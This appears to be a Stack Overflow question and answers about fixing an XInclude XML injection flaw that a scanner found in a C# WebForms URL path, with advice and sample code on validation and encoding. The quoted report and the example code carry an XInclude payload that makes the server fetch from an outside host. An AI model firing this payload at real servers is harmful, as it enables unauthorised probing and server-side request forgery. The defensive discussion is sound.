1

I got a vulnerability report.

XML is injected in the URL "XInclude". I'm trying to find a validation to prevent the XML from being executed. My web application is built using Visual Studio C# with WebForms.

I was thinking to validate this from the web.config or IIS. I'm not sure if I have to add code to validate or parse the XML.


Issue detail:

The URL path filename appears to be vulnerable to XML injection. The payload:

<mhx xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://o6vsilg7waiopz0impyw3z2cn3twho5ptgl3br0.burpcollaborator.net/foo"/></mhx>

was sent to the server. This payload contains some XML that references a URL on an external domain. The application interacted with that domain, indicating that the parser processed the injected XML.


Request

GET /Edit/Employee/%3cmhx%20xmlns%3axi%3d%22http%3a//www.w3.org/2001/XInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a//o6vsilg7waiopz0impyw3z2cn3twho5ptgl3br0.burpcollaborator.net/foo%22/%3e%3c/mhx%3e?RequestId=428 HTTP/1.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Marco Bonelli
Jay
  • You need to create a separate [MCVE] that produces the same behavior and behaves similarly to your application. Without code it is not possible to know how you load XML. Just adding a link to an XML file in a URL by itself will never introduce a security issue. – Alexei Levenkov Aug 26 '20 at 20:52
  • Did you try this code? @Jay – dcansyn Aug 26 '20 at 21:36
  • Check this similar question https://stackoverflow.com/questions/6381689/how-to-prevent-xpath-xml-injection-in-net – Aristos Aug 26 '20 at 22:29

2 Answers

0

You have not included the relevant part of your code in the question, nor have you added much context, so it cannot be answered more precisely than below.

  1. You need to properly encode (with XML encoding) the parameter before writing it into the XML file that then gets processed. Encoding is your first line of defense. That unfortunately is not straightforward at all in C#, and depends on where exactly user input will be written in your XML.

  2. In addition to that, you should validate your input. In the URL above I guess what you are expecting is an Employee id, probably a number. If it is a number, you should validate that before using it. If it's not a number, you can probably still validate it (for example length, character set, format) so that malformed input will not be processed.

These two (well, most probably even one of them) would prevent the vulnerability.

Gabor Lengyel
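
The two steps from the answer above (validate the path segment, and encode anything written into XML), as an added example that is not part of the original answer or the asker's application. The class, method and element names are hypothetical, the id format of 1 to 9 digits is an assumption, and the sample inputs are constructed.

```csharp
using System;
using System.Globalization;
using System.Text.RegularExpressions;
using System.Xml.Linq;

public static class EmployeeRequest
{
    // Assumption: an employee id is 1 to 9 ASCII digits.
    private static readonly Regex IdPattern = new Regex(@"\A[0-9]{1,9}\z");

    // Step 2 of the answer: accept the path segment only if it is a plain number.
    public static bool TryGetEmployeeId(string rawSegment, out int id)
    {
        id = 0;
        if (string.IsNullOrEmpty(rawSegment)) return false;
        // Decode first so %3c-style input is checked in the form later code would see.
        string decoded = Uri.UnescapeDataString(rawSegment);
        return IdPattern.IsMatch(decoded)
            && int.TryParse(decoded, NumberStyles.None, CultureInfo.InvariantCulture, out id);
    }

    // Step 1 of the answer: let the XML API encode values instead of concatenating strings.
    public static string BuildLookupXml(int employeeId, string note)
    {
        var doc = new XElement("employeeLookup",
            new XElement("id", employeeId),
            new XElement("note", note ?? string.Empty));
        return doc.ToString(SaveOptions.DisableFormatting);
    }

    public static void Main()
    {
        // Constructed samples: a normal id, and the scanner payload with a placeholder host.
        string[] segments =
        {
            "1042",
            "%3cmhx%20xmlns%3axi%3d%22http%3a//www.w3.org/2001/XInclude%22%3e" +
            "%3cxi%3ainclude%20href%3d%22http%3a//collaborator.example/foo%22/%3e%3c/mhx%3e"
        };
        foreach (string segment in segments)
        {
            bool ok = TryGetEmployeeId(segment, out int id);
            Console.WriteLine(ok ? "accepted id " + id : "rejected (would return HTTP 400)");
        }
        // Free text still needed inside XML becomes an escaped text node, not markup.
        Console.WriteLine(BuildLookupXml(1042, "<xi:include href=\"http://collaborator.example/foo\"/>"));
    }
}
```

In a WebForms page the rejected branch would set the response status to 400 and stop processing before the value reaches any XML handling.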
0

It is possible to use URL Rewrite in IIS to do that; there is an article on the Microsoft website explaining how it is done. You may have a look at the following article: https://learn.microsoft.com/en-us/iis/extensions/url-rewrite-module/request-blocking-rule-template. It depends on your website's configuration and architecture. You may add some code to validate it, but for that, you have to share how you are handling these requests in your code. One way would be using a regular expression and converting injectable characters to something else. For example, you may use URL encoding too.